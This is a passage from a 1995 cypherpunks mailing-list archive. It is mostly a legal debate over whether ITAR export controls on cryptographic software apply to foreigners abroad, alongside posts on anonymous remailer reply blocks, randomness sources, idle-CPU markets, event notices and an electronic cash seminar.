hear a case that I violated New York law by running a light in
Turkmenistan.

> Go read the section that I quoted again.  Where is there an exception
> for foreign persons who happen to be abroad?  

Do you actually call yourself a lawyer?

You appear to be ignorant of the most basic facts of our legal system
-- knowledge that I, as a complete layman, am completely comfortable
with. I wouldn't pretend to be able to practice law, but even I can
smell utterly insane readings of the regulations.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 02:32:33 +0800
To: "William Allen Simpson" <bsimpson@morningstar.com>
Subject: Re: Photuris Primality verification needed
In-Reply-To: <1999.bsimpson@morningstar.com>
Message-ID: <199511071803.NAA00410@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



"William Allen Simpson" writes:
> As most of us agree that 56-bits is not enough (DES), the 512-bit prime
> seems a waste of time and a tempting target.  I'd like to drop it, but
> Phil is inclined to keep it with a disclaimer.

I agree with your approach, Bill -- it seems worth dropping. Something
this dangerous isn't worth leaving around for people to accidentally
use.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Date: Wed, 8 Nov 1995 04:56:20 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107120300.21752H-100000@viper.law.miami.edu>
Message-ID: <m0tCtPg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
MIME-Version: 1.0
Content-Type: text/plain


Michael Froomkin writes:

: On Tue, 7 Nov 1995, Peter D. Junger wrote:
: 
: > I quite agree that no one can read the Arms Control Export Act as 
: >authorizing the definition of export in the ITAR that requires, among 
: >other things, that a foreign person get a license that the ACEA says 
: >that he can't get, before disclosing cryptographic software to another 
: >foreign person ``in the United States or abroad''. 
: > 
: > The ITAR violates not only the first amendment to the United States 
: > Constitution, it also violates the separation of powers doctrine.  But 
: > it still says what it says.  (And that is why it is unconstitutional.) >
: 
: [Note that this small disagreement between PDJ and me should not obscure 
: our larger areas of agreement...]
: 
: To reiterate my point in legalese:  any court construing the ACEA would
: inevitably read the prohibition on "exporting" to a foreign person as not
: applying where the nation lacks jurisdiction.  This is not even a case of
: applying a construction to save the constitutionality of the statute
: (since it could well take a narrower construction to do that).  It's just
: common sense, which courts actually resort to on occasion. 

I would admit that a court might do this in an effort to hold the
statute constitutional, but a court might also hold the regulations
unconstitutional because they are overbroad.  Remember, the first
amendment is the one area where one has standing to raise facial
constitutional claims even though one's own constitutional rights are
not infringed.  Consider the case where a foreigner in the United
States discloses to another foreigner, and is then prosecuted.
Couldn't he raise the point in his defense?

(But of course the ITAR as applied to cryptographic software--and that
is all that I am talking about--are so unconstitutional in so many
different ways that nothing is going to turn on that one issue.)

But the real problem--to the extent that there is a real problem--is a
more practical one.  What happens when some foreign person who has set
up a large on-line archive of cryptographic software, in part just to
twit the Americans, tries to immigrate to the United States?  If he is
excluded because he violated the export control laws, is he even going
to get a court hearing?  And if by some miracle he does get a court
hearing, isn't the government going to (i) argue that he was
conspiring with some Americans--which would make him indistinguishable
from Noriega--and (ii) argue that he has to be covered, because one cannot
distinguish his case from that of a foreign person who disclosed
cryptographic software within the United States to another foreign
person.  (Remember, the regulation says ``within the United States or
abroad''?)
 
: In short, in this particular case the ACEA, and by extension the ITAR,
: doesn't "say what it says"  it "says what it must mean".  This is an
: important way in which legal parsing differs from compiling... 
 
: ,,,,,
: 
: I'd be interested in hearing more about why you say the ITAR violates
: separation of powers: because it gives the executive branch too much power
: to define the elements of a criminal offense? 


Not that.  My point most simply is that the AECA does not say what the
ITAR says, and that that is why the language of the ITAR violates the
doctrine of separation of powers.  Your argument--as I understand
it--is that the courts will not construe the ACEA as authorizing the
weird and unconstitutional definitions in the ITAR.  My point is that 
the ACEA doesn't authorize the ITAR and that therefore the ITAR is
unenforceable on separation of powers grounds.

I wrote an article about this twenty-five years ago arguing that the
Pentagon Papers case can best be explained as a separation of powers
case.  In the opinions in that case, Near v. Minnesota was the most
cited case, but Youngstown Sheet and Tube v. Sawyer came in a close
second.  My conclusion was that when a court is confronted with a hard
constitutional issue, the better part of valor is to decide the case on
separation of powers grounds, if possible.  In Pentagon Papers there was
no congressional authority for the injunction sought; in the case of the
ITAR there is no congressional authority for the definition of export as
it applies to software (as opposed to hardware).

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet:  junger@pdj2-ra.f-remote.cwru.edu    junger@samsara.law.cwru.edu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Wed, 8 Nov 1995 04:05:36 +0800
To: Mark Murray <mark@grondar.za>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511071907.VAA01462@grumble.grondar.za>
Message-ID: <199511071918.OAA05283@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Mark Murray writes:
> Hmm. Not only is this law unenforceable, it is unenforced. Anyone,
> non-US or otherwise can buy crypto books - you just can't get the code
> on floppy. Bruce Schneier went through this procedure when he CJ'ed
> "Applied Cryptography".

To my knowledge, Bruce Schneier never CJ'ed "Applied
Cryptography". Phil Karn did that.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jennifer Mansfield-Jones <cardtris@umich.edu>
Date: Wed, 8 Nov 1995 04:40:34 +0800
To: cypherpunks@toad.com
Subject: encrypt-key remailers
Message-ID: <Pine.SOL.3.91.951107143109.23860A-100000@gorf.rs.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello, all -- 

I've a semi-clueless question for the gurus here.  I'm trying to
use the Encrypt-Key option on some of the mixmaster (type I)
cypherpunks remailers, and running into trouble.

Please pardon the level of gory detail here; I'm at a loss to
see what I'm missing, so I present a verbatim record of what I
have tried so far.  Consider the sample remailing directions
below.  The remailer-help documents include very similar
examples.  The single-space indenting is only to indicate where
files are included, and avoid complaints from pgp-aware mail
handlers.

 ::
 Encrypt-Key: apasswd
 Request-Remailing-To: cardtris@umich.edu
 Subject: reply-block-test

 **



The above gets encrypted with flame's public key, yielding a
normal little PGP message.

The block gets 

 ::
 Encrypted: PGP

Prepended onto it, and the result looks like:

 ::
 Encrypted: PGP
 
 -----BEGIN PGP MESSAGE-----
 Version: 2.6.2

 hIwDQyA95PVgp+UBA/4/Vm0EMi2BYBCioaLe35qx1rOxQVGEYoulmwjdDtFsXTup
 L08nyycNVIdxIAW5O+0T4kVuV3/ycAd84SmxDAls9n5Ebc6vP+gwE+dWCaY1TNok
 1Ju08hheCJ2nC0piiN/eT0eR646fMvKGI1CiitBKXPSSkPT6alYlQvLPxd+uV6YA
 AACBvZthKwNEb5DQg/5otGH3njgrJISEyvgEKDZaMFuOUPzxk4IZ4NXm0v2cgHVz
 yxMelKz4WHnOylmZ3WWTFmngukIdasIiFf5avRZ/A4Ff1FRXf7SpxvTfGpA4pYPE
 yjmFhsw/NCnRVqBAH65MiU0USQhPZkZDwLe6spBaJpxENq5C
 =/tbc
 -----END PGP MESSAGE-----
 
 
Trying the above, I find that it does *sort of* work as a reply
block.  If I append sample text and send everything to
remailer@flame.alias.net, I get a reply back that looks like, for
instance: 

Date: Mon, 6 Nov 1995 19:22:13 +0100
From: Anonymous <nobody@flame.alias.net>
To: cardtris@umich.edu
Subject: reply-block-test

**


The appended text, which I expected to come back conventionally
encrypted with 'apasswd', has just vanished into the void.  
Obviously I'm missing something... probably something that seemed 
painfully obvious to the writer of the remailer help file.  If I 
omit the encryption key and '**', I can get reply blocks to work fine,
even chained through multiple remailers.  Suggestions?

   many thanks,

                                   -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
  Dept. of Biology                         Jennifer Mansfield-Jones
 University of Michigan                           cardtris@umich.edu
http://www-personal.umich.edu/~cardtris/cardtris.htm
                                             ^---- PGP key available

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ5ueHTZ8yRAewEFAQEewgP/U3OhcBaKSjd1Jpg51UX7NMD3SfrF56WI
fQExYw1lG70GqfEko9T1ft89mDJlj1IvjToR6TJPws8P919Y2qikw333wCt6A9eR
pTMf2Jy1OjKwXRIqlFtrIMky+X2jUYDSMk3H+U1IwT7jjJUfVtzPuSEia0ZzFGmi
U5BLQvrLamQ=
=z1yS
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 8 Nov 1995 04:24:27 +0800
To: "Peter D. Junger" <junger@pdj2-ra.F-REMOTE.CWRU.Edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <m0tCtPg-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.SUN.3.91.951107143034.22821C-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


[much trimmed in various places]

On Tue, 7 Nov 1995, Peter D. Junger wrote:

> Michael Froomkin writes:
> : To reiterate my point in legalese:  any court construing the ACEA would
> : inevitably read the prohibition on "exporting" to a foreign person as not
> : applying where the nation lacks jurisdiction.  This is not even a case of
> : applying a construction to save the constitutionality of the statute
> : (since it could well take a narrower construction to do that).  It's just
> : common sense, which courts actually resort to on occasion. 
> I would admit that a court might do this in an effort to hold the
> statute constitutional, but a court might also hold the regulations
> unconstitutional because they are overbroad.  Remember, the first

Technically, this is holding the regulations ultra vires, not 
unconstitutional; the difference matters.

> amendment is the one area where one has standing to raise facial
> constitutional claims even though one's own constitutional rights are
> not infringed.  Consider the case where a foreigner in the United
> States discloses to another foreigner, and is then prosecuted.
> Couldn't he raise the point in his defense?
>
Note the change in fact pattern: now both foreigners are IN the US where 
indeed they are subject to US law.  My bet: the court has no trouble 
applying the ITAR to these facts and convicting.  I agree this is a 
little silly; but not silly enough to stop it.  [The government will 
argue, and win, as follows: suppose there is no law against murder in 
either of the nations they come from.  Does that mean they can kill each 
other here?]
 
> (But of course the ITAR as applied to cryptographic software--and that
> is all that I am talking about--are so unconstitutional in so many
> different ways that nothing is going to turn on that one issue.)

This issue is now in front of two district judges.

> But the real problem--to the extent that there is a real problem--is a
> more practical one.  What happens when some foreign person who has set
> up a large on-line archive of cryptographic software, in part just to
> twit the Americans, tries to immigrate to the United States?  If he is
> excluded because he violated the export control laws, is he even going
> to get a court hearing?  And if by some miracle he does get a court

Won't need it.  He has committed no offense.  If his petition is turned 
down, he has a right of action.

> hearing, isn't the government going to (i) argue that he was
> conspiring with some Americans--which would make him indistinguishable

Without evidence, they will lose.  Even with evidence, not obvious he has 
done anything wrong.

> from Noriega--and (ii) argue that he has to be covered, because one cannot
> distinguish his case from that of a foreign person who disclosed
> cryptographic software within the United States to another foreign
> person.  (Remember, the regulation says ``within the United States or
> abroad''?)

They lose.  You distinguish it easily ("Now where exactly was the 
defendant at the time, Mr. US Atty?  Germany?  Case dismissed.")

> : I'd be interested in hearing more about why you say the ITAR violates
> : separation of powers: because it gives the executive branch too much power
> : to define the elements of a criminal offense? 
> 
> 
> Not that.  My point most simply is that the AECA does not say what the
> ITAR says, and that that is why the language of the ITAR violates the
> doctrine of separation of powers.  Your argument--as I understand

Ah. Terminological confusion.  That's not a constitutional violation.  
It's an agency misconstruing a statute, rendering the regulations invalid.
See the Administrative Procedures Act....

> it--is that the courts will not construe the ACEA as authorizing the
> weird and unconstitutional definitions in the ITAR.  My point is that 
> the ACEA doesn't authorize the ITAR and that therefore the ITAR is
> unenforceable on separation of powers grounds.
> 
> I wrote an article about this twenty-five years ago arguing that the
> Pentagon Papers case can best be explained as a separation of powers
> case.  In the opinions in that case, Near v. Minnesota was the most
> cited case, but Youngstown Sheet and Tube v. Sawyer came in a close
> second.  My conclusion was that when a court is confronted with a hard
> constitutional issue, the better part of valor is to decide the case on
> separation of powers grounds, if possible.  In Pentagon Papers there was

It's too far off topic to pursue any further, but I must take exception 
to the suggestion that we are well served by separation of powers 
intruding into other legal domains.  Bowsher tells us that causation 
principles go out the window in SOP cases.  That alone makes it radioactive.

> no congressional authority for the injunction sought; in the case of the
> ITAR there is no congressional authority for the definition of export as
> it applies to software (as opposed to hardware).


A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 8 Nov 1995 05:35:20 +0800
To: "Peter D. Junger" <junger@pdj2-ra.f-remote.cwru.edu>
Subject: Re: lp ?
In-Reply-To: <m0tCWQC-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <199511072043.PAA12012@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


"Peter D. Junger" writes:
>"Perry E. Metzger" writes:
>
>: 
>: Thaddeus J. Beier writes:
>: > So, if this person was sending cryptographics codes from Switzerland
>: > to Israel, the code would have been imported to the US, then exported
>: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
>: > but it might be something to threaten UUNET with if one of their Northern
>: > Virginia neighbors ever wanted something they couldn't get otherwise.
>: 
>: It isn't clear that telecoms treaties don't implicitly make this legal
>: in spite of the export regulations.
>
>Once again, what the ITAR forbid is the disclosure of cryptographic
>software to a foreign person within or without the United States, so
>it does not make any difference whether the message containing the
>code passes through the United States or not.

OTOH, the ITAR explicitly permits "temporarily imported" munitions to
be re-exported.  Those clauses should entirely eliminate the issue of
whether UUNET could be held liable under ITAR.  ITAR says otherwise --
see section 120.18.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Scott Brickner <sjb@universe.digex.net>
Date: Wed, 8 Nov 1995 05:42:03 +0800
To: Laurent Demailly <dl@hplyot.obspm.fr>
Subject: Re: So much for free speech...[noise?]
In-Reply-To: <9511061846.AA21160@hplyot.obspm.fr>
Message-ID: <199511072047.PAA12140@universe.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


Laurent Demailly writes:
>"Freedom shall stop where starts the one of the others"
>That's what I learned, and what I think it is a "good thing",
>Thus, your freedom of speech shall stop where it starts hurting
>people
>
>[not that I support at all the childish way l^Hamericans sue everybody
>for anything, but I am happy that racist sayings are not allowed and
>can be condemned in France.]

As a child, we all knew the maxim, "Sticks and stones can break my
bones, but names will never hurt me."  Why have we forgotten it as
adults?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Oliver Huf <ohuf@relay.sedat.de>
Date: Thu, 9 Nov 1995 13:11:51 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Exporting software doesn't mean exporting
In-Reply-To: <m0tCngd-0004JWC@pdj2-ra.F-REMOTE.CWRU.Edu>
Message-ID: <Pine.NXT.3.91.951107144209.255A-100000@oe1>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 7 Nov 1995, Peter D. Junger wrote:

> From Section 120.17 of the ITAR which provides:
> 
>  _Export_ means:
>  . . . .
>  (4) Disclosing (including oral or visual disclosure) or transferring
>  technical data to a foreign person, whether in the United States or
>  abroad . . . .

The ITAR is U.S.-Law. This only applies (by definition) to US-citizens
or persons in the U.S.!

I think it's a common mistake of many Americans that they believe
creating law means creating law for the whole world!


> Go read the section that I quoted again.  Where is there an exception
> for foreign persons who happen to be abroad?  

It's inherent. You simply can't apply US-law to non-US-citizens outside
the U.S.!  


oli.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Henry W. Farkas" <hfarkas@carfax.ims.advantis.com>
Date: Wed, 8 Nov 1995 04:52:57 +0800
To: SINCLAIR DOUGLAS N <sinclai@ecf.toronto.edu>
Subject: Re: Video as a source of randomness
In-Reply-To: <95Nov5.095208edt.917@cannon.ecf.toronto.edu>
Message-ID: <Pine.A32.3.91.951107144655.17867B-100000@gandalf.ims.advantis.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Sun, 5 Nov 1995, SINCLAIR DOUGLAS N wrote:

> The cheapest strong source of video noise that I can think of would be
> a small fan with a ribbon tied to the grille.  As long as it's in a
> turbulent flow regime, you'll get very random numbers at a fast rate.

Oh, I don't know about cheapest.  Electricity costs money.  How does $.32 
per day sound to you?  I've come up with a successful algorithm that 
works like this: I generate a number based upon a random seed.  To get 
the seed, I mail a letter in exactly the same bin at exactly noon 
Monday - Saturday at the US Post Office on Orange Street in New Haven, 
CT.  The letter is always addressed to the exact same recipient.  I simply 
record the number of days it takes for the letter to arrive.  Guaranteed 
random.

===========================================================================
     Henry W. Farkas      |     Me?     Speak for IBM?     Fat chance.
 hfarkas@ims.advantis.com |------------------------------------------------  
   hfarkas@vnet.ibm.com   |     http://www.ims.advantis.com/~hfarkas
      henry@nhcc.com      |          http://www.nhcc.com/~henry 
- ---------------------------------------------------------------------------
PGP 6.2.2 Key fingerprint: AA D0 F5 44 C1 8C 11 52  B3 80 34 1C CE 38 EC 53
 Public key at: pgp-public-keys@pgp.mit.edu, and other popular key servers.
- ---------------------------------------------------------------------------
We'll just outlaw unlicensed cryptography.  After all, it works in France.
You don't see weekly terrorist attacks there any more do you?  - futplex -
===========================================================================


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Auto-signed with Bryce's Auto-PGP v1.0beta

iQCVAwUBMJ+5WqDthkLkvrK9AQFsgwP/UFHv+skRuUb/2V3QgUHmXcDe/dZfBZaZ
d4A78fuixruhtpCU6dJKcfpUzyWz8Y+iYGll+bFiotJuX2xrSnYji2TbesWsp0AL
XjczoLdG/V2RRQrx57R8Zdq33W6QFb/7j16NdXghLizvxUi5LVk6zRAakMhwa2FM
3+ywY6mgM2I=
=dBcX
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: srao@ISI.EDU (Santosh Rao)
Date: Wed, 8 Nov 1995 07:41:25 +0800
To: cypherpunks@toad.com
Subject: Re: idle CPU markets
Message-ID: <199511072315.AA04909@zephyr.isi.edu>
MIME-Version: 1.0
Content-Type: text/plain


> Date: Fri, 27 Oct 1995 06:25:34 -0700
> To: cypherpunks@toad.com
> From: Jay Campbell <edge@got.net>
> Subject: Re: idle CPU markets
> Sender: owner-cypherpunks@toad.com

> A graphic-arts chum of mine is really hyper about cycle sales - it will
> allow him to produce broadcast-quality commercials on a project-by-project
> basis without a huge initial hardware upgrade investment. Is anyone working
> on a Java library/demo/whatnot that allows plug-in algorithms, work
> completion 'fetch next batch' code, and some rudimentary authentication
> scheme? If not, I may tinker with this - if so, I'd like to chat :)


At USC/Information Sciences Institute, we are developing a system that will
enable computer owners to sell or barter processor-cycles on the Internet.
This is in some ways similar to what you talk about, in that it allows
the execution of plug-in applications, and the policies for allocation
and deallocation of remote resources are decided by the owners and are 
transparent to the end user. However, unlike Java, our applications are 
compiled C programs that execute on *compute servers* rather than on
client machines. The application could in turn be an interpreter for 
some other language (e.g. Java). We also support parallel applications 
that use the Parallel Virtual Machine (PVM) libraries for interprocess 
communication. 

We have implemented a prototype known as the Prospero Resource Manager 
(PRM); a parallel version of the POVRAY raytracing program is one of the 
applications we've run using PRM. We are currently working on integrating 
PRM with authentication and payment products (including kerberos, netcheque
and netcash) developed as part of our other projects on security and 
electronic commerce. If you are interested in further information about 
any of these products, or are interested in participating in any aspect 
of PRM's development, we'd be happy to talk to you. More information is also 
available on our web pages: http://nii-server.isi.edu/info/prm and
http://nii-server.isi.edu/gost-group.

We also believe that one of the parallel applications for which PRM is 
useful is showing the weakness of certain encryption methods with limited
key size. If anyone has suggestions for algorithms or software that might
be included as a demo application in the next release of PRM, please contact
me.

Santosh Rao.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hallam@w3.org
Date: Wed, 8 Nov 1995 05:37:44 +0800
To: Michael Froomkin <froomkin@law.miami.edu>
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <Pine.SUN.3.91.951107143034.22821C-100000@viper.law.miami.edu>
Message-ID: <9511072043.AA12971@zorch.w3.org>
MIME-Version: 1.0
Content-Type: text/plain



>> I would admit that a court might do this in an effort to hold the
>> statute constitutional, but a court might also hold the regulations
>> unconstitutional because they are overbroad.  Remember, the first

>Technically, this is holding the regulations ultra vires, not 
>unconstitutional; the difference matters.

I thought Peter was arguing that the separation of powers would be
affected? Surely this would be a constitutional question?

On the strict ultra-vires question and enforcement on non US citizens
may I suggest two hypotheticals?

Hypothetical A:

I develop a crypto system in Geneva and pass the source code to my
co-worker. Neither of us have export certificates.

Hypothetical B:

I set up an anonymous FTP site to receive PGP from abroad. It arrives 
and I hand it over to Fred who has agreed to distribute any material.


It seems to me that in Hypothetical B I am certainly acting in a manner 
which a US court might consider to be something the US government might
seek to prevent. Effectively I would be trafficking. The fact that I only 
hand the goods over to non-US citizens would appear to be irrelevant.

Defining the precise distinction between what is covered and what is 
not is difficult. It is easier to draw the boundaries broadly and let 
the courts decide what is clearly outside the scope. It is not 
necessarily in the government's interests to have sharply defined lines.


		Phill





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jimbell@pacifier.com (jim bell)
Date: Wed, 8 Nov 1995 08:07:28 +0800
To: cypherpunks@toad.com
Subject: Re: lp ?
Message-ID: <m0tCxAm-000912C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


>"Peter D. Junger" writes:
>>"Perry E. Metzger" writes:
>>
>>: 
>>: Thaddeus J. Beier writes:
>>: > So, if this person was sending cryptographics codes from Switzerland
>>: > to Israel, the code would have been imported to the US, then exported
>>: > by UUNET.  They can't do that, can they?  Probably nobody would prosecute,
>>: > but it might be something to threaten UUNET with if one of their Northern
>>: > Virginia neighbors ever wanted something they couldn't get otherwise.
>>: 
>>: It isn't clear that telecoms treaties don't implicitly make this legal
>>: in spite of the export regulations.
>>
>>Once again, what the ITAR forbid is the disclosure of cryptographic
>>software to a foreign person within or without the United States, so
>>it does not make any difference whether the message containing the
>>code passes through the United States or not.
>
>OTOH, the ITAR explicitly permits "temporarily imported" munitions to
>be re-exported.  Those clauses should entirely eliminate the issue of
>whether UUNET could be held liable under ITAR.  ITAR says otherwise --
>see section 120.18.

What if all traffic routed through the US was automatically modified, say,
by inverting all bits, and then de-inverted after it exited the country. (a
software flag would alert the systems to this).  At the time it was
exported, it would not be runnable code, nor compilable source code.

Sure, somebody would claim that "it's easy to turn it into runnable code,
just by XORing the file with ones."  The response is obvious:  Every 100K
file is only a XOR away from every OTHER 100K file.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Froomkin <froomkin@law.miami.edu>
Date: Wed, 8 Nov 1995 06:19:59 +0800
To: hallam@w3.org
Subject: Re: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <9511072043.AA12971@zorch.w3.org>
Message-ID: <Pine.SUN.3.91.951107161844.22821H-100000@viper.law.miami.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 7 Nov 1995 hallam@w3.org wrote:

> >> I would admit that a court might do this in an effort to hold the
> >> statute constitutional, but a court might also hold the regulations
> >> unconstitutional because they are overbroad.  Remember, the first
> 
> >Technically, this is holding the regulations ultra vires, not 
> >unconstitutional; the difference matters.
> 
> I thought Peter was arguing that the separation of powers would be
> affected? Surely this would be a constitutional question?

Yes, that's what he said; I don't agree.

> 
> On the strict ultra-vires question and enforcement on non US citizens
> may I suggest two hypotheticals?
> 
> Hypothetical A:
> 
> I develop a crypto system in Geneva and pass the source code to my
> co-worker. Neither of us have export certificates.

No problem if neither of you are US persons (citizen/green card holder).
> 
> Hypothetical B:
> 
> I set up an anonymous FTP site to receive PGP from abroad. It arrives 
> and I hand it over to Fred who has agreed to distribute any material.

No problem if you and Fred are non-US persons abroad.  Big problem if 
Fred is in the US...

> 
> 
> It seems to me that in Hypothetical B I am certainly acting in a manner 
> which a US court might consider to be something the US government might
> seek to prevent. Effectively I would be trafficking. The fact that I only 
> hand the goods over to non-US citizens would appear to be irrelevant.

No, even our government doesn't seek to regulate crypto transfers between 
two foreign persons living outside the US!  (It might attempt to get a 
foreign government to do something, but that's different.)



A. Michael Froomkin        | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | 
U. Miami School of Law     | froomkin@law.miami.edu
P.O. Box 248087            | http://www.law.miami.edu/~froomkin
Coral Gables, FL 33124 USA | It's warm here.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "J. Kent Hastings" <zeus@pinsight.com>
Date: Wed, 8 Nov 1995 08:43:30 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Karl Hess/Schulman Events
Message-ID: <199511080045.QAA27376@chico.pinsight.com>
MIME-Version: 1.0
Content-Type: text/plain


Visit Neil's page, http://www.pinsight.com/~zeus/jneil/

Here are places he'll be in Southern California this month
to promote his new book. Contact Neil at jneil@genie.com
for more information.

>                     J. NEIL SCHULMAN APPEARANCES
> 
> --------------------------------------------------------------------
> 
>                    "SELF CONTROL Not Gun Control"
>                            November, 1995
> 
>           NOVEMBER, 1995 APPEARANCES
> 
>         * Friday Nov. 10, opening until close of show
>           Saturday Nov. 11, opening until 4 PM
>           Sunday Nov. 12, opening until close of show
>           Personal appearance / book autographing!
>           Great Western Gun Show
>           At Fairplex in Pomona, CA
>           Building 6, Table 7048 --
>           next to Threat Management Institute / Peter Alan
>           Kasler
> 
>         * Saturday Nov. 18, afternoon
>           Personal appearance / book autographing!
>           Richard Kyle Books
>           242 East 3rd Street
>           Long Beach, CA 90802
>           Further Info: (310) 432-KYLE
> 
>         * Monday, Nov. 20, 7:00 PM dinner, 8:15 PM program
>           Speech: "SELF CONTROL Not Gun Control"
>           Karl Hess Club
>           Marie Callender's Restaurant 4356 Lincoln Blvd.
>           Marina Del Rey, CA $13.00 includes meeting, buffet
>           dinner with soup, salad bar, meatloaf entree & sides,
>           corn bread, choice of three pies & beverage, tax &
>           tip included. Reservations appreciated at (310)
>           289-4126, 24 hours.
>           EMail for further info to agorist003@aol.com.
> 
> If you would like J. Neil Schulman to make a personal appearance at
> your club meeting or store, Email: jneil@genie.com or Phone/fax:
> 1-500-44-JNEIL (1-500-445-6345). If difficulty connecting, call
> through AT&T 1-800-CALL-ATT then 500-445-6345.
> 
> --------------------------------------------------------------------
> HTML by J. Kent Hastings, zeus@pinsight.com,
> 
> 1354 East Ave. # R-108, Chico, CA 95926. Fax: (916) 893-1525.

Kent
-- 
"Put pages for your business on the World Wide Web, 
just $5 per month!" -- J. Kent Hastings -- 
zeus@pinsight.com -- http://www.pinsight.com/~zeus/







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 8 Nov 1995 06:48:30 +0800
To: cjs@netcom.com (cjs)
Subject: Re: Sign my own certificates?
Message-ID: <v02120d0cacc588e1e690@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Oh jesus, I need to get myself a certificate for the netscape servers
>at work.
>
>All I need are three forms of identification, two written letters, an
>authorized signature, $300, mailed and faxed, along with an e-mail
>or two.
>
>I think this is an amazing pain in the ass.

You forgot about the sperm sample. I wouldn't necessarily consider that
pain, though...

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Wed, 8 Nov 1995 06:43:23 +0800
To: cypherpunks@toad.com
Subject: (fwd) CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518
Message-ID: <v02120d10acc58ab75501@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


Sorry about the forward, but you'll see why in a sec...

Cheers,
Bob

--- begin forwarded text

Date: Tue, 7 Nov 1995 15:22:34 -0500
To: bsdc@ai.mit.edu
Subject: [joanne@theory.lcs.mit.edu: CIS TALK THIS THURSDAY, Nov 9th 4 p.m.
in 518]
Sender: bounce-bsdc@ai.mit.edu
Precedence: bulk


From: joanne@theory.lcs.mit.edu (Joanne Talbot)
Date: Tue, 07 Nov 95 11:57:15 EST
To: theory-seminars@theory.lcs.mit.edu
Reply-To: theory-seminars-request@theory.lcs.mit.edu
Subject: CIS TALK THIS THURSDAY, Nov 9th 4 p.m. in 518

**Seminar of interest!!

CIS Seminar:    Thursday, Nov. 9th
Place:          NE43-518
Refreshments:   4:00 p.m.
Talk:           4:15 p.m.

Title:          Electronic Cash
Author:         Stefan Brands from CWI

Abstract:
        Two approaches for electronic payments prevail; one focusses
on the secure transmission of creditcard numbers and is account-based,
while the other is token-based and tries to mimic the way coins or
cheques are traded. The first approach can be realized using
elementary cryptographic techniques, but offers at best anonymity of
payments against merchants and requires on-line payment verification.
On-line payment verification can be expensive and become the
bottleneck of a large-scale implementation.

The second approach, electronic cash, can offer full anonymity of
payments, but requires fairly complex cryptographic techniques in
order to guarantee security. Pioneering work in this area has been
done by David Chaum. Unfortunately, his techniques are practical only
for on-line electronic payments and hence less appropriate for
large-scale implementation.

In my presentation I will discuss the design of practical electronic
cash systems that have off-line payment ability.

Further information can be found on: http://www.cwi.nl/~brands/

Host: Ronald Rivest
--- end forwarded text


-----------------
Robert Hettinga (rah@shipwright.com)
